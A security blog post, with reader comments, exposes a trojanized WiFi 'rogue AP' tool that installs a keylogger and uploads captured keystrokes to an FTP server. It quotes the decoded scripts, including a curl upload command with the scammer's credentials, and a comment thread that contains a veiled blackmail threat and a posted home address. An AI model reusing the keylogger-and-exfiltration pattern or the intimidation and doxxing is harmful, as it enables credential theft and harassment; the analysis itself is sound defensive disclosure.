How [not to] scam security people

I have been playing around with some wireless security for one of my customers lately. Having a pretty solid understanding of how things work, but also having been challenged to try out “everything there is to try” by the client, I went off to look for new tools that I might not have tried before.

It did not take too long, and with the accidental help of TechCrunch (btw TechCrunch – you may want to change this link to something else after you read this…) I ran into this “Wifi Security” site.

Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a <blink> tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website – welcome to the 80’s.

Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools…
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:

  1. The provided “tools” aren’t even security tools. Initially I figured – ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even karma which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).
  2. A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from here.
  3. When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.
  4. You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!

Observant readers may notice that I referred to the tool as having “supposed” script files, that are actually binaries, and now I refer back to them as scripts. What gives?
Well, simply put, our attacker didn’t really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he “compiled” them with a utility that packs shellscripts in executable form called shc. The road from a linux executable to realizing what the script originally was is pretty short…

Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light…

# START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)
cd lkl2
./configure –silent
make –silent
make install –silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
chmod +x /root/bg2.sh
nohup /root/bg2.sh &
sleep 2
rm -r /root/nohup.out
clear

So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:

# MENU LIST
echo “”
echo “——————————————————— “
echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “
echo “——————————————————— “
echo “”
echo “1. Compose indemnity text below and send to [email protected]
echo “ Yes, I want activation code and will never use for illegal purpose”
echo “”
echo “2. Check your email for activation code after sending text “
echo “”
read -p “3. Send now ? (0=no, 1=yes) “ act
clear

Obviously, the message WILL appear, as this thing is NEVER going to be activated – remember – this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face… but we are getting ahead of ourselves.

I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests… the script continues according to which version of BT is entered (to accommodate the differences in network configuration…).
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:

firefox https://login.yahoo.com/ &
sleep 4
firefox https://www.google.com/accounts/ManageAccount &
sleep 4
firefox http://home.live.com/

The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and it’s activities are uploaded in the background to the attacker’s FTP – this is exactly where most people will fall into the trap.

And for the grand finale – the actual activation (you’d think huh?):

############################
# DECOY FOR ACTIVATION CODE
clear
echo “”
read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls
sleep 3
echo “You have entered an invalid code ”
echo “”
exit
############################

You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.

That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, wouldn’t it? Let’s see – so, we crafted a “request for free activation” email with the indemnity text in it, and guess what – we got a reply!

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c [email protected] ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE
http://fadzilmahfodh.blogspot.com

So not only there is no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community…
I cordially answered that:

1. Thanks. I’ll be looking forward for the activation code.

2. I’ll probably consider it after being able to test out the tool.

Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it…).
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!
Guess what happens next…

—– Our chat on Wed, 7/7/10 2:53 PM —–
Iftach(2:34 PM):  hey man
Iftach(2:34 PM):  mind if a ask a couple of questions?
fadzilmahfodh(2:34 PM):  okey
Iftach(2:35 PM):  cool. I’m doing this research on security tools and their
authors…
fadzilmahfodh(2:35 PM):  okey
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write
it, how well is it distributed in the community etc…
Iftach(2:36 PM):  does that activation thing a common practice with free tools?
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need
supporter
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for
code
Iftach(2:37 PM):  I see.
fadzilmahfodh(2:37 PM):  i no longer able to provide for free
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my
time and effort
fadzilmahfodh(2:38 PM):  hope you understand

Time and effort? Right… For a scam script that doesn’t even have any networking functionality… Ok, I’ll go along…

Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought
it was a shell script at the beginning). Did you base it on something existing
or write yourself?
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code
Iftach(2:41 PM):  hence the activation i see…
fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope
you understand
Iftach(2:43 PM):  sure, i understand.
fadzilmahfodh(2:43 PM):  So you interested in the software?
Iftach(2:44 PM):  more from a research point of view – for an article I’m
writing
Iftach(2:44 PM):  so, the installer you use, I see that it contains some
additional code that is being compiled on the client.
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user
hardware
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that
to verify that the client is a registered one?
fadzilmahfodh(2:46 PM):  Well, that is another story…
Iftach(2:46 PM):  I’m listening
fadzilmahfodh(2:46 PM):  maybe some other time huh
Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords
through that keylogger that sends the data to your FTP?
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court

At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading… You can’t make this stuff up so I figured I’ll blog it…

Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure
people can send the activation email correctly?
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for
activation – how many passwords do you manage to grab?
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with
data in server
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the
server
fadzilmahfodh(2:49 PM):  then everything will not run
Iftach(2:49 PM):  and how does that relate to the keylogging?
fadzilmahfodh(2:50 PM):  well, that i another story…
Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part
of the verification or is this a separate process?
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that
FTP server per day?
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the
hell am i going to tell you
Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the
site… I’m just doing some research on security tools.
fadzilmahfodh(2:52 PM):  bye
Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m
publishing the story as it is…
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your
site visitor passwords. Unless you want to be quoted otherwise in the story…

True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.

But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload…

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

Just to see the final lameness come to life as I tested the account:

wpid-ftpfail-2010-07-8-09-48.png

And you know what – it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site…), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.

Seriously.

p.s. you can find me talking about this entertaining even on the ISDPodcast with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking…

Update 7/13/2010: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I’m not that surprised by its content (I think it’s called “pulling a ligatt” these days…). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I’m quoting): “rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password”.

You don’t say?! I’m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I’m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don’t be tempted to “smooth-talk” that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I’ll update this story for everyone’s benefit.

27 thoughts on “How [not to] scam security people

  1. Hi Iftach,

    –The road from a linux executable to realizing what the script originally was is pretty short…–

    Can u plz explain how u decompiled those scripts which were compiled with shc?…Thanks

  2. Pingback: Anonymous
  3. @akks – of course. There are two ways:
    The hard way – pop the ELF file in IDA/Olly/dbg and trace it’s execution. You’ll notice that at some point there is a call to shell.c. Taking a look at the memory at that point will show you the whole script.
    The easy way (and I’m all for these kinds of shortcuts) is to monitor the processes (a simple ps axwww would do) – again, you’ll notice how the executable is being called with a parameter (-c) and a more scrutinized look will also show you the entire script (which is passed as a paremeter to the shell interpreter – just scroll up/down through the ps axwww listing and you’ll see what I mean). Easy peasy.

  4. Jesus… Luckily I found this before I hadn’t, hopefully, made a very big mistake. I did download and run the files from his site unfortunatlly yesterday… which means that I did send that stupid email and he probably did get my account password. But, I did change it today, so I hope I’m safe.
    Since he changed his password I don’t know if his account was working yesterday and if he got my password. Could you please help??

    1. Dragos, I can tell you that as of 7/8 (couple of days ago) his ftp account was not working due to missing payments. This means that unless he ponied up some cash you should be ok as your credentials (and whatever else that was keylogged) didn’t go anywhere.
      Nevertheless – I would change passwords on the webmail and the local os you are using (as you might have already done).

  5. my conversation with him afterwards:

    webmaster
    I am online. We can chat now!

    alex
    hi, remember me?

    webmaster
    hi

    alex
    well. I would like to thank you for the scam… I learned a lesson today in not trusting people.
    just curious: did you get my email account credentials or not?

    webmaster
    why you said that tam?

    alex
    is your ftp account running or not?
    tam???
    sorry, don’t undertand

    webmaster
    nevermind, what you want from me now?

    alex
    just to know if you’re gonna be trouble or not…

    webmaster
    i will try to help where ever i can

    alex
    meaning: do you have my email account credentials or not

    webmaster
    too many , i don’t bother to keep everything
    i got about 500+ per day, easy

  6. Jeez Dragos, the guy is completely clueless.
    He thinks you are asking how many hits he gets per day, I don’t think he realizes that he was so blatantly ousted and shamed (seriously – he can’t afford to maintain an FTP account).
    I think you are pretty safe for now – thank goodness that sometimes these guys aren’t the sharpest pencils in the drawer 🙂
    Thanks for the update and the chat log – I’m sure that other readers find this as funny as I have!

  7. Thank you for your interest in our website http://fadzilmahfodh.blogspot.com

    We would like to add a few new information to your post

    1. Since you highlighted this ‘issue’ of keylogger, the number of visitors to our website has double. I guest forbidden ‘fruits’ is more attractive. Thank you for your promotional effort.

    2. The hack using activation code is obsolete and we now have upgraded to a new hacking engine using backtrack4 final which is more lethal.

    3. The script might be ‘lame’ to some of you, but most user find it very useful as not all user are an expert in the field. If you find the script ‘lame’ perhaps it is not meant for you guys.

    4. The new WPA HACK without using dictionary will use: rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password.

    5. The dirvehq account is freely available and one can generate new account without much hassle. The fadzilmahfodh/buaya account is purposely ignored. It is an expired account and post no harm to user.

    6. I hope the webmaster can post my comment so we put the matter in right prospective.

    Thank you.

  8. For those who asked about the comment from Mohd Fadzil Mahfodh above – yeah, looks pretty legit.

    It includes pre-browsing in Google while searching for his own name (vanity), not using a proxy to hide his location (Malaysia – hence the name), full logging of his IP as well as some poking around at the site to look for information on me.

    I truly welcome the honest comment, and the blunt attempt to appear as legitimate website, but I leave it to my readers to judge for themselves who we are dealing with here 🙂

  9. Hi there,

    1. The karma software is obsolete and no longer supported as it already been replace by latest software using bt4 for quite sometime now.

    2. My paypal account is a verified account and linked to my bank here which has my full ID, work and home address. The authorities will be all over me by now if i do illegal activities with the software. I can be easily traced by them. Well, why do i want to do that (illegal activities)?

    3. What your articles said gives some recognition to my skill but a thief, i am certainly not.

    4. However, i am willing to share my technical knowledge to who ever is interested to learn hacking.

    Cheers

  10. @Fadzil – thanks for leaving another comment.

    I’ll bite and actually address the points you have brought up here, although I do believe that you are a criminal and am hopeful that the law enforcement in Malaysia will take care of you (although from my experience I doubt it very much).

    1. ok, so why call your tool “karma” in the first place? another bait? (this one did not have comments in your code so I’m guessing… 🙂 )

    2. Great – we also now have 2 different IP addresses from which you posted your comments un-proxied from Malaysia. Hopefully (but again – I doubt it as I stated before) they will be used appropriately.

    3. Well, not entirely correct. I reckon that your only skills are as a thief. I haven’t really seen any other talent after reviewing the so-called software you proclaim to provide on your site (or for that matter your site, it’s design, your writing skills, or any other technical/software capacity you may claim to have).

    4. Yeah… I’m sure that’s not going to happen. Sorry.

    Hope this put things in perspective, and I’m pretty certain that the uptick that your blog has experiences has been from people laughing at you (and not with you as you may think…)

    1. That’s just epic!

      Really – could you have expected anything else from a juvenile skiddie that can’t even spell?

      I figure that this just proves my point even further along. Can’t trust him. At least one good thing came out of this – the new design sucks less!!!

      Have a great one 🙂

  11. Hi Iamit,

    I saw your face and cv in some of the adult website.

    Is it really you in the photo?

    I hope your wife, kids, parents, neighbors, community will not see you ‘perform’ in their email.

    Adious

  12. Can someone give me activation code for karma.sh!!!!!!!!!!!!!If someone know activation code the plz send it 2 my mail adrs………:)

    1. Jamil,

      Hopefully you have read this post, if not let me sum it up quickly: there is NO activation key for “karma.sh” as provided from the scammer website. You can get a copy of karma from the original author’s site here: http://theta44.org/karma/index.html

      Keep away from the “karma.sh” that you downloaded (the one with the activation key) as it is actually spying on your machine and won’t provide you with any functionality whatsoever…

  13. Iamit,

    I fell victim to this fool recently. I changed most of my passwords. I am wondering though, does the script/program stay running even after reboot? If so, what do I need to do to get it off my computer??

    Thanks for the help!
    Chris

    1. The application does not stay resident on the pc after reboot. The simplest way to get rid of it is to just delete any files associated with it (plus the ones that have been created by it).

      As I mentioned in a later post, we have managed to bring down all the malicious content that has been served by this guy, and the current content is a simple bunch of shell scripts that do not show any malicious content.

  14. Here are his WU DETAILS….. he`s such a retarded brat. I`ll send him the link once the message is up ).

    NEW
    http://chikiabu.blogspot.com/
    [email protected]

    You can donate using cash or credit card to support the website as follows:-

    WESTERN UNION
    ————————-
    First Name : Mohd Fadzil
    Last Name : Mahfodh
    Address : No 2, Jalan 11/2N Najat, Section 11, Shah Alam
    Zip code : 40100
    State : Selangor
    Country : Malaysia

    Amount: euro 11.00

    Package: fish and fakeap hack

Leave a Reply